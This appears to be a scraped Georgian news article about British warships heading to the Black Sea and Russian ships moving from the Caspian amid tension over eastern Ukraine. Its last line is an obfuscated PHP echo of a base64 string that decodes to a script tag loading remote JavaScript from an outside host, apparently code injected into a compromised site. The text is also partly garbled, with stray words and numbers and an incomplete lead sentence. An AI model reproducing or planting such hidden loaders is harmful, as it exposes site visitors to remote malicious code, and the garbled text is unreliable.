celsiusi
ავერსი შნაიდერი
დიდი ბრიტანეთი, უკრაინის აღმოსავლეთში დაძაბულობის ფონზე, შავ ზღვაში სამეფო სამხედრო-საზღვაო ფლოტის, - ამის შესახებ მედია გამოცემა The Sunday Times-ზე დაყრდნობით წერს.
 
გამოცემისთვის ფლოტის ერთ-ერთ მაღალჩინოსანზე დაყრდნობით ცნობილი გახდა, რომ საუბარია ორ ხომალდზე: 45-ე ტიპის საესკადრო ნაღმოსანზე და 23-ე ტიპის წყალქვეშა ნავების საწინააღმდეგო ფრეგატზე.
 
ორივე ხომალდი ხმელთაშუა ზღვის ოპერატიულ-ტაქტიკური ჯგუფის შემადგენლობაში შედის.
 
გამოცემის ცნობით, მაისში ისინი ბოსფორის გავლით შავ ზღვაში გაემგზავრებიან. ხომალდების გადასროლას კიევის მიმართ მხარდაჭერის დემონსტრირება უწოდეს.
 
პარალელურად, რუსეთს, წვრთნების ფარგლებში, კასპიის ზღვიდან შავ ზღვაში 15 სამხედრო ხომალდი გადაჰყავს. რუსეთის თავდაცვის სამინისტროს ცნობით, გადაადგილებას ექვემდებარება კასპიის ფლოტილიაში შემავალი 15 ხომალდი, მათ შორის სამი საარტილერიო და რვა სადესანტო, ასევე დამხმარე გემები. ისინი, შავი ზღვის ფლოტის ძალებთან თანამშრომლობით, მონაწილეობას მიიღებს საზღვაო წვრთნებში.
1567
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");